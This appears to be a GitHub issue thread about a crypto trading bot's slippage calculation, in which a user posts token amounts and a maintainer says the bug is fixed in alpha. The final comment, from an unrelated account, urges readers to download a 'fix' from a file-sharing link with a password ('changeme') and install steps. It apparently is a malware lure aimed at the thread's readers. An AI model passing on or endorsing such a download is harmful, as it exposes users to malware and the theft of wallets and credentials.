### ISSUE TITLE
Slippage problem?

### ISSUE THREAD

**Issue by DDbullet** [TradersClubB/bullet-app#20]
I have a feeling that the math in the sniper for slippage screwed up.

This is how much was the max wallet: 2000000000000000000000000
This is how much is amountOutMin is for me in the failed tx: 631928109638435426849021

When I set up sniper I tried to buy 0.077 ETH which was like 1.95% of the supply.
so it's 19500000000000000000000.
If we now apply 99% slippage to the value about we'll get 195000000000000000000 as an outputOutMin, which is way less than I got.

**Comment by icex** [comment]
order id?

**Comment by DDbullet** [comment]
63e3c6b7b8cb40932151411c

**Comment by icex** [comment]
this is fixed in alpha already

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
